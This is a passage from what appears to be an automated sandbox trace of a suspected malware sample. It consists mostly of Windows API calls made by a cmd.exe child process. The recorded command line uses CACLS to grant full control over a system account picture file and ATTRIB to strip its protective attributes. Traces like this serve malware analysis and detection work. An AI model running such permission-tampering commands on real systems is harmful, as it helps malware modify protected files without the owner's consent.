Arguments=0x24ed08 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0177.035] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ecec, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ecec*=0x1a) returned 1 [0177.036] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.036] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0177.036] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.036] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0177.036] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.036] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0177.036] SetConsoleInputExeNameW () returned 0x1 [0177.036] GetConsoleOutputCP () returned 0x1b5 [0177.036] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0177.036] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.036] exit 
(_Code=0) Process: id = "317" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0xa5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24410 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24411 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24412 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24413 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 24414 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24415 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = 
"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24416 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24417 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24418 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 24419 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24457 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24458 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24459 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24460 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 24461 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 24462 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24463 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24464 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24465 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24466 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24467 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24468 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24469 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24470 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24471 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 24472 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 
24473 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24474 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24475 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 24476 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 24477 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 24478 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 24479 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 24480 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 24510 start_va = 0x1360000 end_va = 0x162efff entry_point = 0x1360000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 428 os_tid = 0xb74 [0176.915] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24faac | out: lpSystemTimeAsFileTime=0x24faac*(dwLowDateTime=0x9f3d5ae0, dwHighDateTime=0x1d440a9)) [0176.915] GetCurrentProcessId () returned 0xa5c [0176.915] GetCurrentThreadId () returned 0xb74 [0176.915] GetTickCount () returned 0x334d5 [0176.915] QueryPerformanceCounter (in: lpPerformanceCount=0x24faa4 | out: 
lpPerformanceCount=0x24faa4*=23370457505) returned 1 [0176.916] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0176.916] __set_app_type (_Type=0x1) [0176.916] __p__fmode () returned 0x76b331f4 [0176.916] __p__commode () returned 0x76b331fc [0176.916] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0176.916] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0176.917] GetCurrentThreadId () returned 0xb74 [0176.917] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb74) returned 0x38 [0176.917] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0176.917] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0176.917] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.917] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0176.917] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fa3c | out: phkResult=0x24fa3c*=0x0) returned 0x2 [0176.917] VirtualQuery (in: lpAddress=0x24fa73, lpBuffer=0x24fa0c, dwLength=0x1c | out: lpBuffer=0x24fa0c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.917] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fa0c, dwLength=0x1c | out: lpBuffer=0x24fa0c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0176.917] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fa0c, dwLength=0x1c | out: lpBuffer=0x24fa0c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, 
Type=0x20000)) returned 0x1c [0176.917] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fa0c, dwLength=0x1c | out: lpBuffer=0x24fa0c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.917] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fa0c, dwLength=0x1c | out: lpBuffer=0x24fa0c*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0176.917] GetConsoleOutputCP () returned 0x1b5 [0176.917] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.917] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0176.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.918] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0176.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.918] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0176.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.918] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0176.918] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.918] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0176.918] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.918] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0176.919] GetEnvironmentStringsW () returned 0x3f0308* [0176.919] FreeEnvironmentStringsW (penv=0x3f0308) returned 1 [0176.919] GetEnvironmentStringsW () returned 0x3f0308* [0176.919] FreeEnvironmentStringsW (penv=0x3f0308) returned 1 [0176.919] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e9ac | out: phkResult=0x24e9ac*=0x40) returned 0x0 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e9b4, 
lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x0, lpData=0x24e9b8*=0xb8, lpcbData=0x24e9b0*=0x1000) returned 0x2 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x1, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x0, lpData=0x24e9b8*=0x1, lpcbData=0x24e9b0*=0x1000) returned 0x2 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x0, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x40, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x40, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x0, lpData=0x24e9b8*=0x40, lpcbData=0x24e9b0*=0x1000) returned 0x2 [0176.919] RegCloseKey (hKey=0x40) returned 0x0 [0176.919] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e9ac | out: phkResult=0x24e9ac*=0x40) returned 0x0 [0176.919] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x0, 
lpData=0x24e9b8*=0x40, lpcbData=0x24e9b0*=0x1000) returned 0x2 [0176.920] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x1, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.920] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x0, lpData=0x24e9b8*=0x1, lpcbData=0x24e9b0*=0x1000) returned 0x2 [0176.920] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x0, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.920] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x9, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.920] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x4, lpData=0x24e9b8*=0x9, lpcbData=0x24e9b0*=0x4) returned 0x0 [0176.920] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e9b4, lpData=0x24e9b8, lpcbData=0x24e9b0*=0x1000 | out: lpType=0x24e9b4*=0x0, lpData=0x24e9b8*=0x9, lpcbData=0x24e9b0*=0x1000) returned 0x2 [0176.920] RegCloseKey (hKey=0x40) returned 0x0 [0176.920] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638c [0176.920] srand (_Seed=0x5b88638c) [0176.920] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"" [0176.920] GetCommandLineW () 
returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"" [0176.920] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.920] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0176.921] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0176.921] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0176.921] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0176.921] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0176.921] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0176.921] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0176.921] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0176.921] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0176.921] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0176.921] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0176.921] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0176.921] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0176.921] GetEnvironmentStringsW () returned 0x3f2458* [0176.921] FreeEnvironmentStringsW (penv=0x3f2458) returned 1 [0176.921] GetEnvironmentVariableW (in: lpName="COMSPEC", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.921] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0176.921] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0176.921] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0176.921] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0176.921] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0176.921] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0176.921] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0176.921] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0176.921] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0176.921] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f778 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.921] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f778, lpFilePart=0x24f774 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f774*="Desktop") returned 0x18 [0176.921] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0176.922] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f4f4 | out: lpFindFileData=0x24f4f4) returned 0x3f0ae8 [0176.922] FindClose (in: hFindFile=0x3f0ae8 | out: hFindFile=0x3f0ae8) returned 1 [0176.922] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f4f4 | out: lpFindFileData=0x24f4f4) returned 0x3f0ae8 [0176.922] FindClose (in: hFindFile=0x3f0ae8 | out: hFindFile=0x3f0ae8) returned 1 [0176.922] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f4f4 | out: lpFindFileData=0x24f4f4) returned 0x3f0ae8 [0176.922] FindClose (in: hFindFile=0x3f0ae8 | out: hFindFile=0x3f0ae8) returned 1 [0176.922] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0176.922] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0176.922] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0176.922] GetEnvironmentStringsW () returned 0x3f0308* [0176.922] FreeEnvironmentStringsW (penv=0x3f0308) returned 1 [0176.922] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.923] GetConsoleOutputCP () returned 0x1b5 [0176.923] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.923] GetUserDefaultLCID () returned 0x409 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f8b8, cchData=128 | out: lpLCData="0") returned 2 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f8b8, cchData=128 | out: lpLCData="0") returned 2 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f8b8, cchData=128 | out: lpLCData="1") returned 2 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0176.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0176.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0176.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") 
returned 4 [0176.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0176.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0176.924] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0176.924] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0176.924] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0176.924] GetConsoleTitleW (in: lpConsoleTitle=0x3e09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.925] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0176.925] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0176.925] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0176.925] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0176.925] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0176.926] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0176.926] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0176.926] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0176.926] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0176.926] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0176.926] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0176.926] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0176.929] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0176.929] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0176.929] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0176.929] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0176.929] _wcsicmp 
(_String1="IF/?", _String2="ATTRIB") returned 8 [0176.929] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0176.929] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0176.931] GetConsoleTitleW (in: lpConsoleTitle=0x24f54c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.015] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0177.015] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0177.015] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0177.015] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0177.015] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0177.015] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0177.015] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0177.015] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0177.015] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0177.015] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0177.015] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0177.015] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0177.015] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0177.016] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0177.016] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0177.016] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0177.016] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0177.016] 